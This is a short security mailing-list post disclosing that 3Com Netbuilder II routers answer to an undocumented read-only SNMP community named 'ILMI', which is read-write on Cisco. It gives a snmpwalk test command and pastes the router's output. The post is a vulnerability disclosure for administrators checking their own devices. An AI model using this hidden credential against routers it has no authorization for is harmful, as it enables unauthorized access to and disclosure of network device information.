undocumented 3com Netbuilder II SNMP ILMI vulnerability

[Juan Manuel Pascual Escriba <pask () plazasite com>]

Hello.

Im receiving a lot of emails asking for community, information available
for this community, etc.

you can test your routers with tools like snmpwalk (*Nix). you can run
for test

snmpwalk router ILMI |more


ILMI (Interim Local Management Interface (ATM concept)) is a
undocumented snmp community in cisco, olicom/crosscom router (this two
vulnerabilities have been reported at February 2001). In Cisco routers
this is a RW community .This afects Netbuilder II routers too, but it is
a Read Only community.

If someone find other model that will be vulnerable please tell me.


i attach the command's result

pask@hades $ snmpwalk router ILMI
system.sysDescr.0 = SW/NBII-CP,9.3
system.sysObjectID.0 = OID: enterprises.43.1.4.12
system.sysUpTime.0 = Timeticks: (2777530) 7:42:55.30
system.sysContact.0 =
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 76
interfaces.ifNumber.0 = 123
interfaces.ifTable.ifEntry.ifIndex.1 = 1
interfaces.ifTable.ifEntry.ifIndex.2 = 2
interfaces.ifTable.ifEntry.ifIndex.3 = 3
interfaces.ifTable.ifEntry.ifIndex.4 = 4
interfaces.ifTable.ifEntry.ifIndex.5 = 5
interfaces.ifTable.ifEntry.ifIndex.6 = 6
interfaces.ifTable.ifEntry.ifIndex.7 = 7
interfaces.ifTable.ifEntry.ifIndex.8 = 8
interfaces.ifTable.ifEntry.ifIndex.9 = 9
interfaces.ifTable.ifEntry.ifIndex.10 = 10


Regards.

Attachment: 3comMIB-cap.zip
Description: